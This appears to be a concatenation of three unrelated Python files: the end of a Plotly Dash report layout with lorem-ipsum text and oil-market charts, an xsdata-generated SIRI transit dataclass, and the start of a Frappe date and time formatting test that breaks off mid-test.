),
html.Div(
[
html.Img(
src=app.get_asset_url(
"wX5mQYn.png"
),
className="exhibit eleven columns",
)
],
className="page-9a",
),
],
className="page-7a",
),
html.Div(
[
html.P(
"Id nulla sollicitudin taciti ac tempus amet ligula accumsan. Elementum, nullam dui ligula ut. Adipiscing sed ultricies ut vitae augue etiam nostra nibh.",
className="page-3h",
),
html.Strong(
"Convallis et eu habitant leo leo luctus venenatis"
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=chinaSpr[
"OECD commercial ex. US NGL & other, x"
],
y=chinaSpr[
"OECD commercial ex. US NGL & other, y"
],
line={
"color": color_1,
"width": 2,
},
mode="lines",
name="OECD commercial ex. US NGL & other",
visible=True,
),
go.Scatter(
x=chinaSpr[
"Non-OECD stocks ex. China SPR, x"
],
y=chinaSpr[
"Non-OECD stocks ex. China SPR, y"
],
line={
"color": color_2,
"width": 2,
},
mode="lines",
name="Non-OECD stocks ex. China SPR",
),
],
"layout": go.Layout(
annotations=[
{
"x": 12.0815219907062,
"y": 948.201438849,
"font": {
"size": 9
},
"showarrow": False,
"text": "GS forecast",
"xref": "x",
"yref": "y",
}
],
height=300,
autosize=True,
dragmode="zoom",
hovermode="closest",
legend={
"x": 0.0913178294574,
"y": -0.167832167832,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"size": 9
},
"orientation": "h",
},
margin={
"r": 10,
"t": 10,
"b": 0,
"l": 40,
"pad": 0,
},
shapes=[
{
"line": {
"color": "rgb(68, 68, 68)",
"dash": "dot",
"width": 1,
},
"type": "line",
"x0": 0.6541331802525385,
"x1": 0.6541331802525385,
"xref": "paper",
"y0": 0,
"y1": 1,
"yref": "paper",
}
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 10,
"range": [
-0.25,
15.5,
],
"showgrid": False,
"showline": False,
"tickfont": {
"size": 9
},
"ticktext": [
"1Q13",
"2Q13",
"3Q13",
"4Q13",
"1Q14",
"2Q14",
"3Q14",
"4Q14",
"1Q15",
"2Q15",
"3Q15E",
"4Q15E",
"1Q16E",
"2Q16E",
"3Q16E",
"4Q16E",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
],
"title": "",
"type": "linear",
"zerolinecolor": "rgb(130, 132, 134)",
"zeroline": False,
"zerolinewidth": 1,
},
yaxis={
"autorange": False,
"nticks": 10,
"range": [
-800,
1000,
],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
},
),
}
)
],
className="page-1i",
),
],
className="page-9b",
),
],
className="page-9c",
)
],
className="exibit six columns",
),
html.Div(
[
html.Div(
[
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
],
className="page-2b",
)
],
className="five columns",
),
],
className="page-9d",
)
],
className="subpage",
)
],
className="page",
),
# Page 10
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Nulla diam conubia nec lacus urna in ligula nec ut egestas sed. Diam inceptos nec venenatis",
className="page-3h",
),
html.P(
"Nulla diam conubia nec lacus urna in ligula nec ut egestas sed",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=oecdIndustry[
"OECD industry stock changes , x"
],
y=oecdIndustry[
"OECD industry stock changes , y"
],
line={
"color": color_1
},
mode="lines",
name="OECD industry stock changes ",
),
go.Scatter(
x=oecdIndustry[
"IEA miscellaneous to balance (rhs), x"
],
y=oecdIndustry[
"IEA miscellaneous to balance (rhs), y"
],
line={
"color": color_2
},
mode="lines",
name="IEA miscellaneous to balance (rhs)",
yaxis="y2",
),
],
"layout": go.Layout(
height=250,
autosize=True,
hovermode="closest",
legend={
"x": 0.0913178294574,
"y": -0.167832167832,
"bgcolor": "rgba(255, 255, 255, 0)",
"orientation": "h",
},
margin={
"r": 30,
"t": 10,
"b": 0,
"l": 30,
},
shapes=[
{
"fillcolor": "rgba(31, 119, 180, 0)",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1997.25,
"x1": 1998.75,
"xref": "x",
"y0": -1713.7349397590363,
"y1": 2391.5662650602408,
"yref": "y",
},
{
"fillcolor": "rgba(31, 119, 180, 0)",
"layer": "above",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 2013.25,
"x1": 2014.75,
"xref": "x",
"y0": -1674.2105263157894,
"y1": 2286.315789473684,
"yref": "y",
},
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 30,
"range": [
1986,
2015,
],
"showgrid": False,
"showline": True,
# 'tickangle': "auto",
"tickfont": {
"size": 8
},
"tickprefix": "1Q",
"ticks": "outside",
"type": "linear",
"zeroline": True,
},
yaxis={
"autorange": False,
"nticks": 10,
"range": [
-2000,
2500,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"type": "linear",
},
yaxis2={
"anchor": "x",
"autorange": False,
"nticks": 12,
"overlaying": "y",
"range": [
-2500,
2500,
],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {
"size": 8
},
"ticks": "outside",
"type": "linear",
"zeroline": False,
},
),
}
)
]
),
],
className="thirdPage first row",
# style={"margin-top": "0px"},
)
] # className="page-9e"
),
html.Div(
[
html.Div(
[
html.Strong(
"Risus amet quam, eget, lacus, orci, dui facilisis dolor sodales arcu facilisi consectetur",
className="page-3h",
),
html.P(
"Diam, maximus ultricies neque adipiscing tellus eros proin",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=wtiOilprices[
"x"
],
y=wtiOilprices[
"y"
],
line={
"color": color_1
},
mode="lines",
name="WTI oil prices (S/bbl, 2015 $) ",
)
],
"layout": go.Layout(
height=250,
autosize=True,
hovermode="closest",
legend={
"x": 0.16818221960553428,
"y": -0.30969810073003856,
"bgcolor": "rgba(255, 255, 255, 0)",
},
margin={
"r": 10,
"t": 10,
"b": 40,
"l": 30,
},
shapes=[
{
"fillcolor": "rgba(31, 119, 180, 0)",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1985.6994029850746,
"x1": 1987.4587313432835,
"xref": "x",
"y0": 10,
"y1": 85,
"yref": "y",
},
{
"fillcolor": "rgba(31, 119, 180, 0)",
"layer": "above",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1998.1650746268656,
"x1": 1999.989328358209,
"xref": "x",
"y0": 5,
"y1": 70,
"yref": "y",
},
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 24,
"range": [
1972,
2015.5,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"titlefont": {
"color": "rgb(92, 53, 143)"
},
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"nticks": 1,
"range": [
0,
180,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"type": "linear",
},
),
}
)
]
),
],
className="thirdPage first row",
)
],
className="page-2c",
),
],
className="page-2b",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Porttitor felis eget nibh quam duis et at a massa varius.",
className="page-3h",
),
html.P(
"Risus amet quam, eget, lacus, orci, dui facilisis ",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=productionCost[
"x"
],
y=productionCost[
"y"
],
line={
"color": color_1
},
mode="lines",
)
],
"layout": go.Layout(
height=200,
margin={
"r": 20,
"t": 10,
"b": 50,
"l": 40,
},
xaxis={
"autorange": False,
"exponentformat": "none",
"linecolor": "rgb(171, 172, 173)",
"nticks": 5,
"range": [
0,
40000,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Cumulative peak oil production (kb/d)",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(171, 172, 173)",
"nticks": 10,
"range": [
0,
45,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Production cost (US$/bbl)",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": False,
},
),
}
)
]
),
],
className="six columns",
),
html.Div(
[
html.Strong(
"Arcu aenean litora quam dignissim penatibus sem ultrices",
className="page-3h",
),
html.P(
"Aenean ipsum nostra magna ut sagittis venenatis",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=production2015[
"Canadian Producers, x"
],
y=production2015[
"Canadian Producers, y"
],
marker={
"color": "rgb(255, 0, 0)",
"symbol": "diamond",
},
mode="markers",
name="Canadian Producers",
visible=True,
),
go.Scatter(
x=production2015[
"US E&Ps and Integrated, x"
],
y=production2015[
"US E&Ps and Integrated, y"
],
marker={
"color": color_2,
"symbol": "diamond",
},
mode="markers",
name="US E&Ps and Integrated",
visible=True,
),
go.Scatter(
x=production2015[
"Others, x"
],
y=production2015[
"Others, y"
],
marker={
"color": color_1,
"symbol": "diamond",
},
mode="markers",
name="Others",
visible=True,
),
],
"layout": go.Layout(
height=200,
autosize=True,
hovermode="closest",
legend={
"x": -0.06,
"y": -0.36,
"font": {
"size": 9
},
"orientation": "h",
},
margin={
"r": 10,
"t": 10,
"b": 0,
"l": 40,
},
showlegend=True,
xaxis={
"autorange": False,
"nticks": 8,
"range": [
0,
100,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"ticksuffix": "%",
"titlefont": {
"size": 9
},
"title": "2015 Net Debt / Capital Employed",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"nticks": 12,
"range": [
0,
45,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "2015 Production Cost $/bbl",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": True,
},
),
}
)
]
),
],
className="six columns",
),
],
className="thirdPage first row",
)
],
className="page-2c",
),
],
className="subpage",
)
],
className="page",
),
# Page 11
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"In tempor mauris non, maximus non odio. Lacus mi arcu, ut parturient ac sed curae \
sed litora amet quam, massa purus condimentum",
className="page-9h",
),
html.P(lorem.paragraph() * 2, className="page-9f"),
html.P(lorem.paragraph(), className="page-9g"),
html.P(lorem.paragraph() * 3, className="page-9f"),
],
className="twelve columns",
),
html.Div(
[
html.P(
"Non amet tempor pellentesque facilisis velit, dui nulla hendrerit sociosqu fusce",
className="page-9g",
),
dcc.Graph(
figure={
"data": [
go.Scatter(
x=energyShare[
"Energy share of HY Issuance, x"
],
y=energyShare[
"Energy share of HY Issuance, y"
],
marker={
"color": color_1,
"symbol": "diamond",
},
mode="lines",
name="Energy share of HY Issuance",
visible=True,
),
go.Scatter(
x=energyShare[
"US oil rig count (monthly change), x"
],
y=energyShare[
"US oil rig count (monthly change), y"
],
marker={
"color": color_2,
"symbol": "diamond",
},
mode="lines",
name="US oil rig count (monthly change)",
yaxis="y2",
),
],
"layout": go.Layout(
height=300,
autosize=True,
hovermode="closest",
legend={
"x": 0.39727646537238737,
"y": -0.12197967025477964,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"orientation": "h",
"traceorder": "reversed",
},
margin={"r": 30, "t": 10, "b": 0, "l": 30},
showlegend=True,
xaxis={
"autorange": True,
"nticks": 10,
"range": [-0.007132542, 8.1854778101],
"showgrid": False,
"tickfont": {"size": 9},
"ticks": "",
"ticktext": [
" Jan-13",
" May-13",
" Sep-13",
" Jan-14",
" May-14",
" Sep-14",
" Jan-15",
" May-15",
],
"tickvals": [0, 1, 2, 3, 4, 5, 6, 7],
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
yaxis={
"autorange": False,
"linecolor": "rgb(136, 137, 140)",
"nticks": 10,
"range": [-300, 150],
"showgrid": False,
"showline": False,
"tickfont": {"size": 9},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
yaxis2={
"anchor": "x",
"autorange": False,
"linecolor": "rgb(136, 137, 140)",
"nticks": 8,
"overlaying": "y",
"range": [0, 35],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {"size": 9},
"ticks": "outside",
"ticksuffix": " %",
"type": "linear",
"zeroline": False,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
),
}
),
],
className="eleven columns",
),
],
className="subpage",
)
],
style={"margin-top": "50px"},
className="page",
),
# Page 12
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Erat cras porta inceptos nibh sociis justo. Natoque mauris nunc etiam, dis quam, tempor consectetur ac \
Pulvinar nunc vitae dui elit hac ante, facilisi, primis nascetur. Non nostra torquent ipsum ac amet",
className="page-9h",
),
html.P(lorem.paragraph(), className="page-1i"),
html.P(lorem.paragraph(), className="page-1i"),
html.H6(
"Ultrices phasellus dignissim, accumsan platea volutpat, sapien mi enim. Pharetra ipsum netus in turpis, \
lorem tempus et. Eget sed. Eu porta cum tempor convallis sed nostra, pellentesque eros.",
className="page-6c",
),
html.Div(
[
dash_table.DataTable(
data=adjustedSales.to_dict(
"records"
),
columns=[
{"id": c, "name": c}
for c in adjustedSales.columns
],
style_data_conditional=[
{
"if": {"row_index": "odd"},
"backgroundColor": color_b,
},
{
"if": {
"column_id": "Quarter"
},
"backgroundColor": color_2,
"color": "black",
},
],
style_header={
"backgroundColor": color_1,
"fontWeight": "bold",
"color": "white",
},
fixed_rows={"headers": True},
style_cell={"width": "150px"},
)
],
className="page-1i",
),
],
className="eleven columns",
)
],
className="page-12a",
)
],
className="subpage",
)
],
className="page",
),
]
)
if __name__ == "__main__":
app.run_server(debug=True)
|
from dataclasses import dataclass, field
from typing import List, Optional
from xsdata.models.datatype import XmlDateTime
from siri.siri_model.siri_facility_v2_0 import (
FacilityChangeElement,
FacilityConditionElement,
)
from siri.siri_model.siri_journey_support_v2_0 import (
FirstOrLastJourneyEnumeration,
FramedVehicleJourneyRefStructure,
)
from siri.siri_model.siri_journey_v2_0 import (
JourneyNote,
SimpleContactStructure,
ViaNameStructure,
)
from siri.siri_model.siri_reference_v2_0 import (
PublishedLineName,
VehicleModesEnumeration,
)
from siri.siri_model.siri_situation_identity_v1_1 import SituationRef
from siri.siri_utility.siri_types_v2_0 import (
NaturalLanguagePlaceNameStructure,
NaturalLanguageStringStructure,
)
from siri.siri_utility.siri_utility_v1_1 import Extensions
__NAMESPACE__ = "http://www.siri.org.uk/siri"
@dataclass
class InterchangeJourneyStructure:
"""
Type for feeder or Distributor Journey info about a VEHICLE JOURNEY.
:ivar line_ref: Reference to a LINE.
:ivar direction_ref: Reference to a DIRECTION, typically outward or
return.
:ivar framed_vehicle_journey_ref: A reference to the dated VEHICLE
JOURNEY that the VEHICLE is making.
:ivar journey_pattern_ref: Identifier of JOURNEY PATTERN that
journey follows.
    :ivar journey_pattern_name: Name of JOURNEY PATTERN.
:ivar vehicle_mode: A means of transportation such as bus, rail,
etc.
:ivar route_ref: Identifier of ROUTE that journey follows.
:ivar published_line_name: Name or Number by which the LINE is known
to the public. (Unbounded since SIRI 2.0)
:ivar group_of_lines_ref: Reference to a GROUP OF LINEs to which
journey belongs. SIRI 2.0
:ivar direction_name: Description of the DIRECTION. May correspond
to a DESTINATION DISPLAY. (Unbounded since SIRI 2.0)
:ivar external_line_ref: Alternative identifier of LINE that an
external system may associate with journey.
    :ivar operator_ref: OPERATOR of a VEHICLE JOURNEY. Note that the
        operator may change over the course of a journey. This should
        show the operator for the current point in the journey. Use
        Journey Parts to record all the operators in the whole journey.
    :ivar product_category_ref: Product Classification of VEHICLE
        JOURNEY - subdivides a transport mode, e.g. express, local.
    :ivar service_feature_ref: Classification of service into arbitrary
        Service categories, e.g. school bus. Recommended SIRI values
        based on TPEG are given in SIRI documentation and enumerated in
        the siri_facilities package. Corresponds to NeTEX TYPE OF
        SERVICE.
:ivar vehicle_feature_ref: Features of VEHICLE providing journey.
Recommended SIRI values based on TPEG are given in SIRI
documentation and enumerated in the siri_facilities package.
:ivar origin_ref:
:ivar origin_name: Name of the origin of the journey. (Unbounded
since SIRI 2.0)
:ivar origin_short_name: Short name of the origin of the journey;
used to help identify the VEHICLE JOURNEY on arrival boards. If
absent, same as Origin Name.
    :ivar destination_display_at_origin: DIRECTION name shown for
        journey at the origin. +SIRI v2.0
:ivar via: Names of VIA points, used to help identify the LINE, for
example, Luton to Luton via Sutton. Currently 3 in VDV. Should
only be included if the detail level was requested.
:ivar destination_ref: Reference to a DESTINATION.
    :ivar destination_name: Description of the destination stop (vehicle
        signage). Can be overwritten for a journey, and then also
        section by section by the entry in an individual CALL.
        (Unbounded since SIRI 2.0)
    :ivar destination_short_name: Short name of the DESTINATION of the
        journey; used to help identify the VEHICLE JOURNEY on arrival
        boards. If absent, same as DestinationName. (Unbounded since
        SIRI 2.0)
:ivar vehicle_journey_name: For train services with named journeys.
Train name, e.g. “West Coast Express”. If omitted: No train
name. Inherited property. (Unbounded since SIRI 2.0)
:ivar journey_note:
:ivar public_contact: Contact details for use by members of public.
+SIRI v2.0
:ivar operations_contact: Contact details for use by operational
staff. +SIRI v2.0
:ivar headway_service: Whether this is a Headway Service, that is
shown as operating at a prescribed interval rather than to a
fixed timetable. Default is 'false'.
:ivar origin_aimed_departure_time: Timetabled departure time from
Origin.
:ivar destination_aimed_arrival_time: Timetabled arrival time at
Destination.
:ivar first_or_last_journey:
    :ivar facility_condition_element: Information about a change of
        Equipment availability at stop or on vehicle that may affect
        access or use.
:ivar facility_change_element:
:ivar situation_ref:
:ivar block_ref: BLOCK that VEHICLE is running.
:ivar course_of_journey_ref: COURSE OF JOURNEY ('Run') that VEHICLE
is running.
:ivar vehicle_journey_ref:
:ivar vehicle_ref:
    :ivar additional_vehicle_journey_ref: Reference to other VEHICLE
        JOURNEYs (+SIRI v2.0)
:ivar driver_ref: A reference to the DRIVER or Crew currently logged
in to operate a monitored VEHICLE. May be omitted if real-time
data is not available - i.e. it is timetabled data. +SIRI v2.0
    :ivar driver_name: The name of the Driver or Crew. +SIRI v2.0
:ivar monitored: Whether there is real-time information available
for journey; if not present, not known.
    :ivar aimed_departure_time: On a Distributor journey, the timetabled
        departure time of the VEHICLE JOURNEY from the CONNECTION LINK
        for the SERVICE JOURNEY INTERCHANGE. On a Feeder journey, the
        timetabled arrival time of the VEHICLE JOURNEY at the CONNECTION
        LINK for the SERVICE JOURNEY INTERCHANGE.
:ivar extensions:
"""
line_ref: Optional[str] = field(
default=None,
metadata={
"name": "LineRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
"required": True,
},
)
direction_ref: Optional[str] = field(
default=None,
metadata={
"name": "DirectionRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
"required": True,
},
)
framed_vehicle_journey_ref: Optional[FramedVehicleJourneyRefStructure] = field(
default=None,
metadata={
"name": "FramedVehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_pattern_ref: Optional[str] = field(
default=None,
metadata={
"name": "JourneyPatternRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_pattern_name: Optional[NaturalLanguageStringStructure] = field(
default=None,
metadata={
"name": "JourneyPatternName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_mode: List[VehicleModesEnumeration] = field(
default_factory=list,
metadata={
"name": "VehicleMode",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
route_ref: Optional[str] = field(
default=None,
metadata={
"name": "RouteRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
published_line_name: List[PublishedLineName] = field(
default_factory=list,
metadata={
"name": "PublishedLineName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
group_of_lines_ref: Optional[str] = field(
default=None,
metadata={
"name": "GroupOfLinesRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
direction_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "DirectionName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
external_line_ref: Optional[str] = field(
default=None,
metadata={
"name": "ExternalLineRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
operator_ref: Optional[str] = field(
default=None,
metadata={
"name": "OperatorRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
product_category_ref: Optional[str] = field(
default=None,
metadata={
"name": "ProductCategoryRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
service_feature_ref: List[str] = field(
default_factory=list,
metadata={
"name": "ServiceFeatureRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_feature_ref: List[str] = field(
default_factory=list,
metadata={
"name": "VehicleFeatureRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_ref: Optional[str] = field(
default=None,
metadata={
"name": "OriginRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "OriginName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_short_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "OriginShortName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_display_at_origin: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "DestinationDisplayAtOrigin",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
via: List[ViaNameStructure] = field(
default_factory=list,
metadata={
"name": "Via",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_ref: Optional[str] = field(
default=None,
metadata={
"name": "DestinationRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "DestinationName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_short_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "DestinationShortName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_journey_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "VehicleJourneyName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_note: List[JourneyNote] = field(
default_factory=list,
metadata={
"name": "JourneyNote",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
public_contact: Optional[SimpleContactStructure] = field(
default=None,
metadata={
"name": "PublicContact",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
operations_contact: Optional[SimpleContactStructure] = field(
default=None,
metadata={
"name": "OperationsContact",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
headway_service: Optional[bool] = field(
default=None,
metadata={
"name": "HeadwayService",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_aimed_departure_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "OriginAimedDepartureTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_aimed_arrival_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "DestinationAimedArrivalTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
first_or_last_journey: Optional[FirstOrLastJourneyEnumeration] = field(
default=None,
metadata={
"name": "FirstOrLastJourney",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
facility_condition_element: List[FacilityConditionElement] = field(
default_factory=list,
metadata={
"name": "FacilityConditionElement",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
facility_change_element: Optional[FacilityChangeElement] = field(
default=None,
metadata={
"name": "FacilityChangeElement",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
situation_ref: List[SituationRef] = field(
default_factory=list,
metadata={
"name": "SituationRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
block_ref: Optional[str] = field(
default=None,
metadata={
"name": "BlockRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
course_of_journey_ref: Optional[str] = field(
default=None,
metadata={
"name": "CourseOfJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_journey_ref: Optional[str] = field(
default=None,
metadata={
"name": "VehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_ref: Optional[str] = field(
default=None,
metadata={
"name": "VehicleRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
additional_vehicle_journey_ref: List[FramedVehicleJourneyRefStructure] = field(
default_factory=list,
metadata={
"name": "AdditionalVehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
driver_ref: Optional[str] = field(
default=None,
metadata={
"name": "DriverRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
driver_name: Optional[str] = field(
default=None,
metadata={
"name": "DriverName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
monitored: Optional[bool] = field(
default=None,
metadata={
"name": "Monitored",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
aimed_departure_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "AimedDepartureTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
extensions: Optional[Extensions] = field(
default=None,
metadata={
"name": "Extensions",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
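# Illustrative round-trip (not part of the generated bindings; assumes
# xsdata's standard serializer API):
#
#     from xsdata.formats.dataclass.serializers import XmlSerializer
#     from xsdata.formats.dataclass.serializers.config import SerializerConfig
#
#     journey = InterchangeJourneyStructure(
#         line_ref="Line:23", direction_ref="outbound", monitored=True
#     )
#     xml = XmlSerializer(config=SerializerConfig(pretty_print=True)).render(journey)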
|
# Copyright (c) 2019, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
import datetime
import unittest
import frappe
from frappe.utils import (
format_datetime,
format_time,
formatdate,
get_datetime,
get_time,
get_user_date_format,
get_user_time_format,
getdate,
)
test_date_obj = datetime.datetime.now()
test_date = test_date_obj.strftime("%Y-%m-%d")
test_time = test_date_obj.strftime("%H:%M:%S.%f")
test_datetime = test_date_obj.strftime("%Y-%m-%d %H:%M:%S.%f")
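# Each entry below maps a user-facing format string to the strftime
# rendering that the formatters under test are expected to produce.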
test_date_formats = {
"yyyy-mm-dd": test_date_obj.strftime("%Y-%m-%d"),
"dd-mm-yyyy": test_date_obj.strftime("%d-%m-%Y"),
"dd/mm/yyyy": test_date_obj.strftime("%d/%m/%Y"),
"dd.mm.yyyy": test_date_obj.strftime("%d.%m.%Y"),
"mm/dd/yyyy": test_date_obj.strftime("%m/%d/%Y"),
"mm-dd-yyyy": test_date_obj.strftime("%m-%d-%Y"),
}
test_time_formats = {
"HH:mm:ss": test_date_obj.strftime("%H:%M:%S"),
"HH:mm": test_date_obj.strftime("%H:%M"),
}
class TestFmtDatetime(unittest.TestCase):
"""Tests date, time and datetime formatters and some associated
utility functions. These rely on the system-wide date and time
formats.
"""
# Set up and tidy up routines
def setUp(self):
        # remember the current system defaults so tearDown can restore them
self.pre_test_date_format = frappe.db.get_default("date_format")
self.pre_test_time_format = frappe.db.get_default("time_format")
def tearDown(self):
frappe.db.set_default("date_format", self.pre_test_date_format)
frappe.db.set_default("time_format", self.pre_test_time_format)
frappe.local.user_date_format = None
frappe.local.user_time_format = None
frappe.db.rollback()
# Test utility functions
def test_set_default_date_format(self):
frappe.db.set_default("date_format", "ZYX321")
self.assertEqual(frappe.db.get_default("date_format"), "ZYX321")
def test_set_default_time_format(self):
frappe.db.set_default("time_format", "XYZ123")
self.assertEqual(frappe.db.get_default("time_format"), "XYZ123")
def test_get_functions(self):
# Test round-trip through getdate, get_datetime and get_time
self.assertEqual(test_date_obj, get_datetime(test_datetime))
self.assertEqual(test_date_obj.date(), getdate(test_date))
self.assertEqual(test_date_obj.time(), get_time(test_time))
# Test date formatters
def test_formatdate_forced(self):
# Test with forced date formats
self.assertEqual(formatdate(test_date, "dd-yyyy-mm"), test_date_obj.strftime("%d-%Y-%m"))
self.assertEqual(formatdate(test_date, "dd-yyyy-MM"), test_date_obj.strftime("%d-%Y-%m"))
def test_formatdate_forced_broken_locale(self):
# Test with forced date formats
lang = frappe.local.lang
# Force fallback from Babel
try:
frappe.local.lang = "FAKE"
self.assertEqual(formatdate(test_date, "dd-yyyy-mm"), test_date_obj.strftime("%d-%Y-%m"))
self.assertEqual(formatdate(test_date, "dd-yyyy-MM"), test_date_obj.strftime("%d-%Y-%m"))
finally:
frappe.local.lang = lang
def test_format_date(self):
# Test formatdate with various default date formats set
for fmt, valid_fmt in test_date_formats.items():
frappe.db.set_default("date_format", fmt)
frappe.local.user_date_format = None
self.assertEqual(get_user_date_format(), fmt)
self.assertEqual(formatdate(test_date), valid_fmt)
# Test time formatters
def test_format_time_forced(self):
# Test with forced time formats
self.assertEqual(format_time(test_time, "ss:mm:HH"), test_date_obj.strftime("%S:%M:%H"))
def test_format_time(self):
# Test format_time with various default time formats set
for fmt, valid_fmt in test_time_formats.items():
